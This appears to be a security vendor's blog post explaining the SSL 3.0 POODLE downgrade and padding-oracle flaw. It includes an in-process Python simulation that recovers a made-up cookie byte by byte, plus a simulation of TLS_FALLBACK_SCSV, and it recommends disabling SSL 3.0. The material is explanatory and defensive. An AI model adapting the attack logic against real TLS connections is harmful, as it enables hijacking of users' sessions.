

SSL 3.0 POODLE Vulnerability

Have you ever used Wi-Fi in a coffee shop, restaurant, or other public place? In a perfect world we could browse the web freely and securely, without worrying that the personal information we send might end up in the wrong hands. Unfortunately, we don't live in a perfect world, and any time you connect to public Wi-Fi you need to be aware of the dangers out there.

SSL encryption is important because it prevents eavesdropping and protects the personal information we send. Once an attacker has that information they can take anything they want, including bank passwords, credit card numbers, and more. A properly configured SSL/TLS connection encrypts your communications so that these malicious people cannot read your private information off the wire.

Google recently revealed a design flaw in SSL 3.0 that it calls POODLE (Padding Oracle On Downgraded Legacy Encryption) and that affects all major browsers. SSL 3.0 is almost 15 years old, but browsers still fall back to it to work around bugs in HTTPS servers. Google security expert Bodo Möller explained, "Because a network attacker can cause connection failures, they can trigger the use of SSL 3.0 and then exploit this issue." Because POODLE only works when SSL 3.0 is in use, an attacker on the network forces the downgrade by blocking the browser's initial TLS handshakes until it retries with SSL 3.0. The flaw itself is in SSL 3.0's CBC padding: the receiver checks only the final padding-length byte and ignores the rest, so by copying a chosen ciphertext block into the padding position and watching whether the server accepts or rejects the record, an attacker learns one byte of plaintext for roughly every 256 requests. Applied to the requests a browser sends, that is enough to decrypt the secure cookies that identify your logged-in session.
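To make the padding-oracle mechanism concrete, here is an added simulation (not code from the original post, Google's paper, or any browser or server). It models the three parties in POODLE in one process: the browser, which sends a request whose URL and body lengths the attacker's script controls but whose cookie the attacker cannot read; an SSL 3.0 server, which checks only the last padding byte before verifying the MAC; and the attacker, who moves a ciphertext block into the padding slot and counts accepts. Assumptions: the session key, cookie value and "Cookie: " header layout are made up; an 8-round Feistel network built on SHA-256 stands in for AES so nothing outside the standard library is needed; a fresh IV per record stands in for SSL 3.0's CBC chaining (all the attack needs is that a re-sent request encrypts differently); and the cookie length is assumed known, which in practice is read off the ciphertext length. The `check_all_padding` flag switches the server to the TLS 1.0 rule that every padding byte must carry the length, which closes the oracle.

```python
import hashlib
import hmac
import random

BLOCK = 16                     # block size of the stand-in cipher (same as AES)
MAC_LEN = 20                   # SSL 3.0 used a 20-byte SHA-1 MAC; HMAC-SHA1 stands in
KEY = b"session-key-known-to-both-ends-only"   # assumed; the attacker never sees it
SECRET = b"session=c00k1e42"   # assumed cookie value the attacker wants to recover
HEADER = b"Cookie: "           # known request layout that precedes the cookie
_rng = random.Random(2014)     # seeded so the simulation is repeatable

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# An 8-round Feistel network with a SHA-256 round function stands in for AES so the
# example needs nothing outside the standard library. It is a real keyed permutation,
# which is all that CBC mode and the padding oracle depend on.
def _round(i, half):
    return hashlib.sha256(KEY + bytes([i]) + half).digest()[:8]

def block_encrypt(b):
    l, r = b[:8], b[8:]
    for i in range(8):
        l, r = r, _xor(l, _round(i, r))
    return l + r

def block_decrypt(b):
    l, r = b[:8], b[8:]
    for i in reversed(range(8)):
        l, r = _xor(r, _round(i, l)), l
    return l + r

def cbc_encrypt(iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(_xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        out.append(_xor(block_decrypt(ct[i:i + BLOCK]), prev))
        prev = ct[i:i + BLOCK]
    return b"".join(out)

def victim_request(prefix_len, suffix_len):
    """The browser. The attacker's script picks the URL length (prefix) and body length
    (suffix); the browser adds the cookie, the MAC and SSL 3.0 padding, whose bytes before
    the final length byte are arbitrary (here: random). Fresh IV per record, see lead-in."""
    plaintext = b"/" * prefix_len + HEADER + SECRET + b"B" * suffix_len
    mac = hmac.new(KEY, plaintext, "sha1").digest()
    pad_len = BLOCK - 1 - (len(plaintext) + MAC_LEN) % BLOCK
    padding = bytes(_rng.getrandbits(8) for _ in range(pad_len)) + bytes([pad_len])
    iv = bytes(_rng.getrandbits(8) for _ in range(BLOCK))
    return iv, cbc_encrypt(iv, plaintext + mac + padding)

def server_accepts(iv, ct, check_all_padding=False):
    """The server. SSL 3.0 inspects only the final length byte before checking the MAC;
    TLS 1.0 and later (check_all_padding=True) require every padding byte to equal it."""
    pt = cbc_decrypt(iv, ct)
    pad_len = pt[-1]
    if pad_len >= BLOCK:
        return False
    if check_all_padding and any(b != pad_len for b in pt[-1 - pad_len:-1]):
        return False
    body, mac = pt[:-1 - pad_len - MAC_LEN], pt[-1 - pad_len - MAC_LEN:-1 - pad_len]
    return hmac.compare_digest(hmac.new(KEY, body, "sha1").digest(), mac)

def poodle_recover(secret_len, check_all_padding=False, max_tries=20000):
    """The attacker. Recovers the cookie one byte per roughly 256 requests, using nothing
    but whether the server accepted the record. Returns (recovered_bytes, requests_sent)."""
    recovered, sent = b"", 0
    for k in range(secret_len):
        # URL length such that cookie byte k is the last byte of a plaintext block ...
        prefix_len = (BLOCK - 1 - len(HEADER) - k) % BLOCK
        # ... and body length such that data + MAC fill whole blocks, so the record ends
        # with a full block of padding whose only checked byte must be 15.
        suffix_len = -(prefix_len + len(HEADER) + secret_len + MAC_LEN) % BLOCK
        target = (prefix_len + len(HEADER) + k) // BLOCK   # plaintext block holding byte k
        for _ in range(max_tries):
            sent += 1
            iv, ct = victim_request(prefix_len, suffix_len)
            blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
            # Swap the padding block for the target block C_t. The server decrypts it as
            # P_t XOR C_{t-1} XOR C_prev (C_prev = the block before the padding block)
            # and accepts iff that block's last byte is 15, which leaks P_t's last byte.
            forged = ct[:-BLOCK] + blocks[target + 1]
            if server_accepts(iv, forged, check_all_padding):
                recovered += bytes([(BLOCK - 1) ^ blocks[target][-1] ^ blocks[-2][-1]])
                break
        else:
            return recovered, sent   # no acceptance within budget: the oracle is closed
    return recovered, sent
```

Running `poodle_recover(len(SECRET))` returns the full cookie after a few thousand simulated requests; `poodle_recover(len(SECRET), check_all_padding=True, max_tries=1000)` returns nothing, because a forged block now also has to produce fifteen correct padding bytes, which the attacker cannot arrange. The request count is the practical cost the paper cites: about 256 requests per cookie byte, all of them generated by a script the victim's browser is tricked into running.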

The only real fix is to stop using SSL 3.0 and require TLS (Transport Layer Security), whose padding checks make it immune to POODLE. Google also recommends supporting TLS_FALLBACK_SCSV, a signal the browser adds to its handshake when it retries at a lower protocol version, so that a server which supports a higher version can reject the downgrade. TLS_FALLBACK_SCSV complements disabling SSL 3.0 rather than replacing it: it only helps when both the browser and the server implement it, and it does nothing for a connection that legitimately negotiates SSL 3.0 because one side supports nothing newer.
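The interplay between the browser's fallback loop, TLS_FALLBACK_SCSV and disabling SSL 3.0 on the server is easier to see in a worked exchange. The following is an added simulation written for this page, not browser or server code: the version names and the 0x5600 signalling value are the real ones from RFC 7507, while the idea that an on-path attacker "drops" a fixed number of handshakes, the `server_min`/`server_max` parameters and the transcript format are modelling assumptions. The server applies the RFC 7507 rule: if the ClientHello carries the SCSV and offers a version below the server's best, answer with an inappropriate_fallback alert instead of downgrading.

```python
TLS_FALLBACK_SCSV = 0x5600        # signalling cipher-suite value from RFC 7507
VERSIONS = ["SSLv3", "TLSv1.0", "TLSv1.1", "TLSv1.2"]   # lowest to highest
AES128_SHA = 0x002F               # an ordinary suite so the ClientHello is not empty

def server_hello(server_min, server_max, client_version, cipher_suites):
    """Server side. Returns ('negotiated', version) or ('alert', description).
    server_min/server_max model the protocols the operator left enabled (assumed)."""
    if VERSIONS.index(client_version) < VERSIONS.index(server_min):
        return ("alert", "protocol_version")            # e.g. SSL 3.0 disabled
    if TLS_FALLBACK_SCSV in cipher_suites and \
            VERSIONS.index(client_version) < VERSIONS.index(server_max):
        return ("alert", "inappropriate_fallback")      # RFC 7507: refuse the downgrade
    return ("negotiated", min(client_version, server_max, key=VERSIONS.index))

def client_connect(server_min, server_max, handshakes_dropped, send_scsv):
    """Client side: the browser's fallback loop. An on-path attacker drops the first
    `handshakes_dropped` attempts (modelled, not real network code); the client then
    retries with the next-lower version. Returns (negotiated_version_or_None, transcript)."""
    transcript = []
    for attempt, version in enumerate(reversed(VERSIONS)):
        suites = [AES128_SHA]
        if attempt > 0 and send_scsv:
            suites.append(TLS_FALLBACK_SCSV)   # "this is a retry at a lower version"
        if attempt < handshakes_dropped:
            transcript.append((version, ("dropped", None)))
            continue
        result = server_hello(server_min, server_max, version, suites)
        transcript.append((version, result))
        if result[0] == "negotiated":
            return result[1], transcript
        if result[1] == "inappropriate_fallback":
            return None, transcript            # fail closed: do not keep retrying downward
        # protocol_version alert: try the next-lower version, if any
    return None, transcript

if __name__ == "__main__":
    scenarios = [
        ("legacy server, no SCSV, attacker drops 3", "SSLv3", "TLSv1.2", 3, False),
        ("legacy server, SCSV, attacker drops 3", "SSLv3", "TLSv1.2", 3, True),
        ("SSLv3 disabled, no SCSV, attacker drops 3", "TLSv1.0", "TLSv1.2", 3, False),
        ("SSLv3 disabled, no SCSV, attacker drops 2", "TLSv1.0", "TLSv1.2", 2, False),
        ("SSLv3 disabled, SCSV, attacker drops 2", "TLSv1.0", "TLSv1.2", 2, True),
    ]
    for name, lo, hi, drops, scsv in scenarios:
        outcome, transcript = client_connect(lo, hi, drops, scsv)
        print(f"{name}: negotiated={outcome}")
        for version, result in transcript:
            print(f"    {version:8} -> {result}")
```

The scenarios show why the two measures are complementary. Against a server that still enables SSL 3.0, a browser without the SCSV is walked all the way down to SSLv3, which is exactly the POODLE precondition; with the SCSV the same server refuses with inappropriate_fallback and the connection fails safely. Disabling SSL 3.0 on the server removes the POODLE target even for browsers that never send the SCSV, but an attacker can still push such a browser from TLS 1.2 down to TLS 1.0; only the SCSV stops that downgrade as well.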

Google says that Chrome already sends TLS_FALLBACK_SCSV and that it will remove Chrome's SSL 3.0 fallback, while Mozilla warns that Firefox is vulnerable. Mozilla plans to address the issue by disabling SSL 3.0 by default in Firefox 34. Because that fix will not ship until the November 25th release, users on current versions can install an add-on from Mozilla that disables SSL 3.0 in the meantime. Older versions of Internet Explorer are also affected, and IE 6 in particular is the main reason SSL 3.0 is still enabled on many servers: it is the newest protocol that browser supports by default.

Attacks and vulnerabilities are inevitable, but following security news and keeping your systems up to date helps prevent compromises. This specific attack does not hand the attacker your passwords directly, but by decrypting your session cookie it lets them log in as you to your email, Facebook, photo sites, or bank and do whatever they like there. No one wants to have their personal life exposed. Next time you are using free Wi-Fi in a coffee shop, restaurant, or bar, make sure your browser has SSL 3.0 disabled and that the sites you use are served over TLS. Otherwise, look around: the person next to you could know you more intimately than your loved ones.

RedOrum can provide proper configurations and SSL services to help mitigate POODLE. For more information contact us.
